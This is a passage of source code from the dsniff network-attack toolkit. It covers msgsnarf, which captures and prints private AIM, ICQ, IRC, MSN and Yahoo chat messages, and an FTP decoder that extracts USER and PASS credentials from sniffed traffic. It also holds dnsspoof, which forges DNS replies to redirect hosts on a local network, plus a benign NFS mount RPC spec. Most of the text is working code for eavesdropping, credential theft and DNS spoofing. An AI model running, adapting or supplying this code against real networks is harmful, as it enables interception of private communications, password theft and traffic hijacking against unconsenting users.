next; }; SLIST_HEAD(, client_info) client_list; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: msgsnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]\n"); exit(1); } static char * timestamp(void) { static char stamp[32]; struct tm *tm; time_t now; time(&now); tm = localtime(&now); strftime(stamp, sizeof(stamp), "%b %e %T", tm); return (stamp); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } struct flap { u_char start; u_char channel; u_short seqnum; u_short datalen; }; struct snac { u_short family; u_short subtype; u_short flags; u_int32_t reqid; }; static int process_aim(struct client_info *info, u_char *data, int len) { struct buf *msg, *word, buf; struct flap *flap; struct snac *snac; u_char c, *p; int i, reply; buf_init(&buf, data, len); if (buf_cmp(&buf, "FLAPON\r\n\r\n", 10) == 0) buf_skip(&buf, 10); while (buf_len(&buf) > sizeof(*flap)) { flap = (struct flap *)buf_ptr(&buf); flap->datalen = ntohs(flap->datalen); i = sizeof(*flap) + flap->datalen; if ((msg = buf_tok(&buf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*flap)); snac = (struct snac *)buf_ptr(msg); if (flap->start != 0x2a) continue; if (flap->channel == 0x01) { if (buf_cmp(msg, "\x00\x00\x00\x01\x00\x01\x00", 7) == 0) { buf_skip(msg, 7); buf_get(msg, &c, 1); if ((word = buf_getbuf(msg, 0, c)) != NULL) { if (info->nick) free(info->nick); info->nick = buf_strdup(word); buf_free(word); } buf_skip(msg, 3); buf_get(msg, &c, 1); buf_skip(msg, c + 4); if (buf_cmp(msg, "ICQ", 3) == 0) info->type = "ICQ"; else info->type = "AIM"; } } else if (flap->channel == 0x02) { if (buf_cmp(msg, "toc_send_im ", 12) == 0) { buf_skip(msg, 12); if ((word = buf_getword(msg, " ", 1)) == NULL) continue; buf_skip(msg, 1); if (buf_len(msg) < 3) continue; msg->end -= 2; p = buf_strdup(msg); if (regex_match(p)) printf("%s AIM %s > %.*s: %s\n", timestamp(), info->nick, buf_len(word), buf_ptr(word), p); buf_free(word); free(p); } else if (buf_cmp(msg, "IM_IN:", 6) == 0) { buf_skip(msg, 6); if ((word = buf_getword(msg, ":", 1)) == NULL) continue; buf_skip(msg, 2); p = buf_strdup(msg); if (regex_match(p)) printf("%s AIM %.*s > %s: %s\n", timestamp(), buf_len(word), buf_ptr(word), info->nick, p); buf_free(word); free(p); } else if (ntohs(snac->family) == 0x04) { if (ntohs(snac->subtype) == 0x06) reply = 0; else if (ntohs(snac->subtype) == 0x07) reply = 1; else continue; buf_skip(msg, sizeof(*snac) + 8); buf_get(msg, &c, 1); if ((word = buf_getbuf(msg, 0, c)) == NULL) continue; /* XXX - ugh, this is totally bogus. help! */ if (buf_cmp(msg, "\x00\x02", 2) == 0) { buf_skip(msg, 17); while (buf_cmp(msg, "\x00", 1) == 0) buf_skip(msg, 1); } else if (buf_cmp(msg, "\x00\x05", 2) == 0) { buf_skip(msg, 97); } else if (buf_cmp(msg, "\x00\x00", 2) == 0) { if (buf_skip(msg, 145) < 0) buf_skip(msg, 57); } p = buf_strdup(msg); if (p && strlen(p) && regex_match(p)) { if (reply) { printf("%s %s %.*s > %s: %s\n", timestamp(), info->type, buf_len(word), buf_ptr(word), info->nick, p); } else printf("%s %s %s > %.*s: %s\n", timestamp(), info->type, info->nick, buf_len(word), buf_ptr(word), p); } buf_free(word); if (p) free(p); } } } return (len - buf_len(&buf)); } static int process_irc(struct client_info *info, u_char *data, int len) { struct buf *line, *word, *prefix, buf; char *p; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\n", 1)) >= 0) { line = buf_tok(&buf, NULL, i); buf_skip(&buf, 1); if (line->base[line->end-1] == '\r') line->end--; if (buf_cmp(line, ":", 1) == 0) { buf_skip(line, 1); if ((prefix = buf_getword(line, " ", 1)) == NULL) continue; if ((i = buf_index(prefix, "!", 1)) < 0) continue; prefix->end = i; } else prefix = NULL; if (buf_cmp(line, "JOIN ", 5) == 0 && prefix != NULL) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); printf("%s IRC *** %.*s ", timestamp(), buf_len(prefix), buf_ptr(prefix)); prefix->offset = prefix->end + 1; prefix->end = prefix->size; printf("(%.*s) has joined channel %.*s\n", buf_len(prefix), buf_ptr(prefix), buf_len(line), buf_ptr(line)); } else if (buf_cmp(line, "PART ", 5) == 0 && prefix != NULL) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); if ((word = buf_getword(line, " :", 2)) == NULL) continue; printf("%s IRC *** %.*s has left channel %.*s\n", timestamp(), buf_len(prefix), buf_ptr(prefix), buf_len(word), buf_ptr(word)); buf_free(word); } else if (buf_cmp(line, "QUIT ", 5) == 0 && prefix != NULL) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); printf("%s IRC *** Signoff: %.*s (%.*s)\n", timestamp(), buf_len(prefix), buf_ptr(prefix), buf_len(line), buf_ptr(line)); } else if (buf_cmp(line, "NICK ", 5) == 0) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); if (prefix != NULL) { printf("%s IRC *** %.*s is now known as %.*s\n", timestamp(), buf_len(prefix), buf_ptr(prefix), buf_len(line), buf_ptr(line)); } else { if (info->nick) free(info->nick); info->nick = buf_strdup(line); } } else if (buf_cmp(line, "PRIVMSG ", 8) == 0) { buf_skip(line, 8); if ((word = buf_getword(line, " :", 2)) == NULL) continue; p = buf_strdup(line); if (regex_match(p)) { if (strncmp(p + 1, "ACTION ", 7) == 0) { printf("%s IRC * Action: ", timestamp()); if (prefix != NULL) { printf("%.*s %s\n", buf_len(prefix), buf_ptr(prefix), p + 8); } else printf("%s %s\n", info->nick, p + 8); } else { if (prefix != NULL) { printf("%s IRC %.*s > ", timestamp(), buf_len(prefix), buf_ptr(prefix)); } else printf("%s IRC %s > ", timestamp(), info->nick); printf("%.*s: %s\n", buf_len(word), buf_ptr(word), p); } } buf_free(word); free(p); } } return (len - buf_len(&buf)); } static int process_msn(struct client_info *info, u_char *data, int len) { struct buf *word, *line, buf; char *p; int i, reply; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { line = buf_tok(&buf, NULL, i); buf_skip(&buf, 2); if (buf_cmp(line, "USR ", 4) == 0) { if ((i = buf_index(line, "MD5 ", 4)) > 0) { buf_skip(line, i + 4); if (buf_cmp(line, "I ", 2) == 0) { buf_skip(line, 2); if (info->nick != NULL) free(info->nick); info->nick = buf_strdup(line); } } } else if (buf_cmp(line, "IRO ", 4) == 0) { if ((i = buf_rindex(line, "1 ", 2)) < 0) continue; buf_skip(line, i + 2); word = buf_getword(line, " ", 1); if (info->peer != NULL) free(info->peer); info->peer = buf_strdup(word); buf_free(word); } else if (buf_cmp(line, "MSG ", 4) == 0) { buf_skip(line, 4); reply = 0; if ((word = buf_getword(line, " ", 1)) == NULL) continue; if (buf_cmp(line, "N ", 2) == 0 || buf_cmp(line, "U ", 2) == 0) { reply = 1; } else { if (info->peer != NULL) free(info->peer); info->peer = buf_strdup(word); } buf_free(word); if ((i = buf_rindex(line, " ", 1)) < 0) continue; buf_skip(line, i + 1); p = buf_strdup(line); i = atoi(p); free(p); if (i <= 0) continue; if ((line = buf_tok(NULL, NULL, i)) == NULL) break; if (buf_index(line, "Content-Type: text/plain", 24) > 0) { if ((i = buf_rindex(line, "\r\n\r\n", 4)) < 0) continue; buf_skip(line, i + 4); p = buf_strdup(line); if (regex_match(p)) { if (reply) { printf("%s MSN %s > %s: %s\n", timestamp(), info->nick, info->peer, p); } else printf("%s MSN %s > %s: %s\n", timestamp(), info->peer, info->nick, p); } free(p); } } } return (len - buf_len(&buf)); } struct yhoo { u_char version[8]; u_int32_t length; /* all fields little-endian */ u_int32_t service; u_int32_t connid; u_int32_t magic; u_int32_t unknown; u_int32_t type; u_char nick1[36]; u_char nick2[36]; }; struct ymsg { u_char version[8]; u_short length; u_short type; u_int32_t unknown1; u_int32_t unknown2; }; static int process_yahoo(struct client_info *info, u_char *data, int len) { struct yhoo *yhoo; struct ymsg *ymsg; struct buf *msg, *nick1, *nick2, buf; int i, reply; char *p; buf_init(&buf, data, len); if (buf_cmp(&buf, "YMSG", 4) == 0) { while (buf_len(&buf) > sizeof(*ymsg)) { ymsg = (struct ymsg *)buf_ptr(&buf); ymsg->length = ntohs(ymsg->length); ymsg->type = ntohs(ymsg->type); i = sizeof(*ymsg) + ymsg->length; if ((msg = buf_tok(&buf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*ymsg)); if (ymsg->type != 0x06) continue; reply = (buf_cmp(msg, "1", 1) != 0); buf_skip(msg, 3); nick1 = buf_getword(msg, "\xc0\x80", 2); buf_skip(msg, 3); nick2 = buf_getword(msg, "\xc0\x80", 2); buf_skip(msg, 4); msg->end -= 2; p = buf_strdup(msg); if (regex_match(p) && nick1 && nick2 && msg) { printf("%s Yahoo ", timestamp()); if (reply) printf("%.*s > %.*s: %s\n", buf_len(nick2), buf_ptr(nick2), buf_len(nick1), buf_ptr(nick1), p); else printf("%.*s > %.*s: %s\n", buf_len(nick1), buf_ptr(nick1), buf_len(nick2), buf_ptr(nick2), p); } if (nick1) buf_free(nick1); if (nick2) buf_free(nick2); free(p); } } else { while (buf_len(&buf) > sizeof(*yhoo)) { yhoo = (struct yhoo *)buf_ptr(&buf); yhoo->length = pletohl(&yhoo->length); yhoo->service = pletohl(&yhoo->service); yhoo->type = pletohl(&yhoo->type); yhoo->nick1[sizeof(yhoo->nick1) - 1] = '\0'; yhoo->nick2[sizeof(yhoo->nick2) - 1] = '\0'; i = sizeof(*yhoo) + yhoo->length; if ((msg = buf_tok(&buf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*yhoo)); if (yhoo->service != 6 || yhoo->type > 1) continue; if ((nick1 = buf_getword(msg, ",", 1)) == NULL) continue; if (memcmp(yhoo->version, "YHOO", 4) == 0) { buf_skip(msg, 1); reply = 0; } else reply = 1; p = buf_strdup(msg); if (regex_match(p)) { if (reply) printf("%s Yahoo %.*s > %s: %s\n", timestamp(), buf_len(nick1), buf_ptr(nick1), yhoo->nick2, p); else printf("%s Yahoo %s > %.*s: %s\n", timestamp(), yhoo->nick2, buf_len(nick1), buf_ptr(nick1), buf_ptr(msg)); } free(p); } } return (len - buf_len(&buf)); } static void sniff_msgs(struct tcp_stream *ts, void **conn_save) { struct client_info *c; int (*process_msgs)(struct client_info *, u_char *, int); int i; if (ts->addr.dest >= 6660 && ts->addr.dest <= 6680) { process_msgs = process_irc; } else if (ts->addr.dest == 5190 || ts->addr.dest == 9898) { process_msgs = process_aim; } else if (ts->addr.dest == 5050) { process_msgs = process_yahoo; } else if (ts->addr.dest == 1863) { process_msgs = process_msn; } else return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; ts->client.collect = 1; i = 0; SLIST_FOREACH(c, &client_list, next) { if (c->ip == ts->addr.saddr) { i = 1; break; } } if (i == 0) { if ((c = malloc(sizeof(*c))) == NULL) nids_params.no_mem("sniff_msgs"); memset(c, 0, sizeof(*c)); c->ip = ts->addr.saddr; c->nick = strdup("unknown"); SLIST_INSERT_HEAD(&client_list, c, next); } *conn_save = (void *)c; break; case NIDS_DATA: c = (struct client_info *)*conn_save; if (ts->server.count_new > 0) { i = process_msgs(c, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } else if (ts->client.count_new > 0) { i = process_msgs(c, ts->client.data, ts->client.count - ts->client.offset); nids_discard(ts, i); } fflush(stdout); break; default: c = (struct client_info *)*conn_save; if (ts->server.count > 0) process_msgs(c, ts->server.data, ts->server.count - ts->server.offset); else if (ts->client.count > 0) process_msgs(c, ts->client.data, ts->client.count - ts->client.offset); fflush(stdout); break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:p:hv?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'p': nids_params.filename = optarg; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) nids_params.pcap_filter = copy_argv(argv + 1); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); SLIST_INIT(&client_list); nids_register_tcp(sniff_msgs); if (nids_params.pcap_filter != NULL) { if (nids_params.filename == NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else { warnx("using %s [%s]", nids_params.filename, nids_params.pcap_filter); } } else { if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } } nids_run(); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/mount.x0000664000175000017500000001362515105626144017354 0ustar epsilonepsilon/* minimal spec for dsniff's decode_mountd(). */ /* * Copyright (c) 1988,1990,1991,1992 by Sun Microsystems, Inc. */ /* * Protocol description for the mount program */ const MNTPATHLEN = 1024; /* maximum bytes in a pathname argument */ const MNTNAMLEN = 255; /* maximum bytes in a name argument */ const FHSIZE = 32; /* size in bytes of a v2 file handle */ const FHSIZE3 = 64; /* " " " " " v3 " " */ /* * The fhandle is the file handle that the server passes to the client. * All file operations are done using the file handles to refer to a file * or a directory. The file handle can contain whatever information the * server needs to distinguish an individual file. * * Versions 1 and 2 of the protocol share a filehandle of 32 bytes. * * Version 3 supports a 64 byte filehandle that can be used only * with version 3 of the NFS protocol. */ typedef opaque fhandle[FHSIZE]; typedef opaque fhandle3; /* * If a V2 status of zero is returned, the call completed successfully, and * a file handle for the directory follows. A non-zero status indicates * some sort of error. The status corresponds with UNIX error numbers. */ union fhstatus switch (unsigned fhs_status) { case 0: fhandle fhs_fhandle; default: void; }; /* * This #define is added for backwards compatability with applications * which reference the old style fhstatus. The second element of that * structure was called fhs_fh, instead of the current fhs_fhandle. */ % %#define fhs_fh fhstatus_u.fhs_fhandle /* * The following status codes are defined for the V3 mount service: * Note that the precise enum encoding must be followed; the values * are derived from existing implementation practice, and there is * no good reason to disturb them. */ enum mountstat3 { MNT_OK= 0, /* no error */ MNT3ERR_PERM=1, /* Not owner */ MNT3ERR_NOENT=2, /* No such file or directory */ MNT3ERR_IO=5, /* I/O error */ MNT3ERR_ACCES=13, /* Permission denied */ MNT3ERR_NOTDIR=20, /* Not a directory*/ MNT3ERR_INVAL=22, /* Invalid argument.*/ MNT3ERR_NAMETOOLONG=63, /* File name too long */ MNT3ERR_NOTSUPP=10004, /* operation not supported */ MNT3ERR_SERVERFAULT=10006 /* An i/o or similar failure caused */ /* the server to abandon the request */ /* No attributes can be returned. The */ /* client should translate this into EIO */ }; /* * A V3 server returns a file handle and a list of the authentication * flavors that the server will accept for this mount. If the list * is empty, AUTH_UNIX is required. Otherwise, any of the flavors * listed in auth_flavors<> may be used (but no others). * The values of the authentication flavors are defined in the * underlying RPC protocol. */ struct mountres3_ok { fhandle3 fhandle; int auth_flavors<>; }; /* * If a V3 status of MNT_OK is returned, the call completed successfully, and * a file handle for the directory follows. Any other status indicates * some sort of error. */ union mountres3 switch (mountstat3 fhs_status) { case MNT_OK: mountres3_ok mountinfo; default: void; }; /* * The type dirpath is the pathname of a directory */ typedef string dirpath; program MOUNTPROG { /* * Version one of the mount protocol communicates with version two * of the NFS protocol. The only connecting point is the fhandle * structure, which is the same for both protocols. */ version MOUNTVERS { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * If fhs_status is 0, then fhs_fhandle contains the * file handle for the directory. This file handle may * be used in the NFS protocol. This procedure also adds * a new entry to the mount list for this client mounting * the directory. * Unix authentication required. */ fhstatus MOUNTPROC_MNT(dirpath) = 1; } = 1; /* * Version two of the mount protocol communicates with version two * of the NFS protocol. It is identical to version one except for a * new procedure call for posix. */ version MOUNTVERS_POSIX { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * If fhs_status is 0, then fhs_fhandle contains the * file handle for the directory. This file handle may * be used in the NFS protocol. This procedure also adds * a new entry to the mount list for this client mounting * the directory. * Unix authentication required. */ fhstatus MOUNTPROC_MNT(dirpath) = 1; } = 2; /* * Version 3 of the mount protocol communicates with version 3 * of the NFS protocol. The only connecting point is the nfs_fh3 * structure, which is the same for both protocols. * * The only significant change over version 2 is that MOUNTPROC_MNT * returns a longer filehandle (64 bytes instead of 32) as well * as authentication information. MOUNTPROC_PATHCONF is subsumed * into V3 of the NFS protocol and MOUNTPROC_EXPORTALL is eliminated. */ version MOUNTVERS3 { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * Mount a file system. * * If mountres.fhs_status is NFS_OK, then mountres.mountinfo * contains the file handle for the directory and * a list of acceptable authentication flavors. This file * handle may only be used in version 3 of the NFS protocol. * This procedure also results in the server adding a new * entry to its mount list recording that this client has * mounted the directory. Unix authentication or better * is required. */ mountres3 MOUNTPROC_MNT(dirpath) = 1; } = 3; } = 100005; hackerschoice-dsniff-a17510d/decode_ftp.c0000664000175000017500000000217615105626144020260 0ustar epsilonepsilon/* * decode_ftp.c * * File Transfer Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_ftp.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "options.h" #include "buf.h" #include "decode.h" extern struct _dc_meta dc_meta; int decode_ftp(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; int i, n; if ((len = strip_telopts(buf, len)) == 0) return (0); buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (!buf_isascii(&inbuf)) return (0); n = 0; while ((i = buf_index(&inbuf, "\n", 1)) != -1) { line = buf_tok(&inbuf, NULL, i); buf_skip(&inbuf, 1); if (i > 0 && line->base[i - 1] == '\r') line->end--; line->base[line->end] = '\0'; if (strncasecmp(buf_ptr(line), "USER ", 5) == 0 || strncasecmp(buf_ptr(line), "ACCT ", 5) == 0 || strncasecmp(buf_ptr(line), "PASS ", 5) == 0) { buf_putf(&outbuf, "%s\n", buf_ptr(line)); dc_meta.is_hot = 1; n++; } } if (n < 2) return (0); buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/dnsspoof.c0000664000175000017500000001524015105626144020013 0ustar epsilonepsilon/* * dnsspoof.c * * Forge replies to arbitrary DNS A / PTR queries on the LAN. * * Copyright (c) 2000 Dug Song * * $Id: dnsspoof.c,v 1.10 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" struct dnsent { char *name; in_addr_t ip; SLIST_ENTRY(dnsent) next; }; SLIST_HEAD(, dnsent) dns_entries; pcap_t *pcap_pd = NULL; int pcap_off = -1; libnet_t *l; u_long lnet_ip = -1; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: dnsspoof [-i interface] [-f hostsfile] [expression]\n"); exit(1); } /* Pattern matching code from OpenSSH. */ static int match_pattern(const char *s, const char *pattern) { for (;;) { if (!*pattern) return (!*s); if (*pattern == '*') { pattern++; if (!*pattern) return (1); if (*pattern != '?' && *pattern != '*') { for (; *s; s++) { if (*s == *pattern && match_pattern(s + 1, pattern + 1)) return (1); } return (0); } for (; *s; s++) { if (match_pattern(s, pattern)) return (1); } return (0); } if (!*s) return (0); if (*pattern != '?' && *pattern != *s) return (0); s++; pattern++; } /* NOTREACHED */ } static void dns_init(char *dev, char *filename) { FILE *f; libnet_t *l; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; struct dnsent *de; char *ip, *name, buf[1024]; if ((l = libnet_init(LIBNET_LINK, dev, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); if ((lnet_ip = libnet_get_ipaddr4(l)) == -1) errx(1, "%s", libnet_geterror(l)); libnet_destroy(l); SLIST_INIT(&dns_entries); if (filename != NULL) { if ((f = fopen(filename, "r")) == NULL) err(1, "fopen"); while (fgets(buf, sizeof(buf), f) != NULL) { if (buf[0] == '#' || buf[0] == '\n') continue; if ((ip = strtok(buf, "\t ")) == NULL || (name = strtok(NULL, "\n\t ")) == NULL) continue; if ((de = malloc(sizeof(*de))) == NULL) err(1, "malloc"); if ((de->ip = inet_addr(ip)) == INADDR_ANY || (de->name = strdup(name)) == NULL) errx(1, "invalid entry"); SLIST_INSERT_HEAD (&dns_entries, de, next); } fclose(f); } else { if ((de = malloc(sizeof(*de))) == NULL) err(1, "malloc"); de->ip = lnet_ip; de->name = "*"; SLIST_INSERT_HEAD (&dns_entries, de, next); } } static in_addr_t dns_lookup_a(const char *name) { struct dnsent *de; SLIST_FOREACH(de, &dns_entries, next) { if (match_pattern(name, de->name)) return (de->ip); } return (-1); } static char * dns_lookup_ptr(const char *name) { struct dnsent *de; int a0, a1, a2, a3; in_addr_t dst; char *a; if (strchr(name, '%') != NULL) return (NULL); if (sscanf(name, "%d.%d.%d.%d.", &a3, &a2, &a1, &a0) != 4) return (NULL); a = (char *)&dst; a[0] = a0 & 0xff; a[1] = a1 & 0xff; a[2] = a2 & 0xff; a[3] = a3 & 0xff; SLIST_FOREACH(de, &dns_entries, next) { if (de->ip == dst && strchr(de->name, '*') == NULL) return (de->name); } return (NULL); } static void dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt) { struct libnet_ipv4_hdr *ip; struct libnet_udp_hdr *udp; HEADER *dns; char name[MAXHOSTNAMELEN]; u_char *p, *q, *end, buf[1024]; int i, anslen, dnslen; in_addr_t dst; u_short type, class; ip = (struct libnet_ipv4_hdr *)(pkt + pcap_off); udp = (struct libnet_udp_hdr *)(pkt + pcap_off + (ip->ip_hl * 4)); dns = (HEADER *)(udp + 1); p = (u_char *)(dns + 1); end = (u_char *)pkt + pkthdr->caplen; if ((dnslen = end - (u_char *)dns) < sizeof(*dns)) return; if (dns->opcode != QUERY || ntohs(dns->qdcount) != 1 || dns->ancount || dns->nscount || dns->arcount) return; if ((i = dn_expand((u_char *)dns, end, p, name, sizeof(name))) < 0) return; p += i; GETSHORT(type, p); GETSHORT(class, p); if (class != C_IN) return; p = buf + dnslen; if (type == T_A) { if ((dst = dns_lookup_a(name)) == -1) return; /* XXX - cheat on alignment. */ memcpy(p, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04", 12); memcpy(p + 12, &dst, sizeof(dst)); anslen = 16; } else if (type == T_PTR) { if ((q = dns_lookup_ptr(name)) == NULL) return; /* XXX - cheat on alignment. */ memcpy(p, "\xc0\x0c\x00\x0c\x00\x01\x00\x00\x00\x3c", 10); anslen = dn_comp(q, p + 12, 256, NULL, NULL); p += 10; PUTSHORT(anslen, p); anslen += 12; } else return; memcpy(buf, (u_char *)dns, dnslen); dns = (HEADER *)buf; dns->qr = dns->ra = 1; if (type == T_PTR) dns->aa = 1; dns->ancount = htons(1); dnslen += anslen; libnet_clear_packet(l); libnet_build_udp(ntohs(udp->uh_dport), ntohs(udp->uh_sport), LIBNET_UDP_H + dnslen, 0, (u_int8_t *)buf, dnslen, l, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_UDP_H + dnslen, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_UDP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, l, 0); if (libnet_write(l) < 0) warn("write"); fprintf(stderr, "%s.%d > %s.%d: %d+ %s? %s\n", libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(udp->uh_sport), libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(udp->uh_dport), ntohs(dns->id), type == T_A ? "A" : "PTR", name); } static void cleanup(int sig) { libnet_destroy(l); pcap_close(pcap_pd); exit(0); } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char *p, *dev, *hosts, buf[1024]; char ebuf[LIBNET_ERRBUF_SIZE]; int i; dev = hosts = NULL; while ((i = getopt(argc, argv, "i:f:h?")) != -1) { switch (i) { case 'i': dev = optarg; break; case 'f': hosts = optarg; break; default: usage(); break; } } argc -= optind; argv += optind; if (dev == NULL && (dev = pcap_lookupdev(buf)) == NULL) errx(1, "%s", buf); dns_init(dev, hosts); if (argc > 0) { p = copy_argv(argv); strlcpy(buf, p, sizeof(buf)); } else snprintf(buf, sizeof(buf), "udp dst port 53 and not src %s", libnet_addr2name4(lnet_ip, LIBNET_DONT_RESOLVE)); if ((pcap_pd = pcap_init_dsniff(dev, buf, 128)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pcap_pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((l = libnet_init(LIBNET_RAW4, dev, ebuf)) == NULL) errx(1, "couldn't initialize sending"); libnet_seed_prand(l); signal(SIGHUP, cleanup); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); warnx("listening on %s [%s]", dev, buf); pcap_loop(pcap_pd, -1, dns_spoof, NULL); /* NOTREACHED */ exit(0); }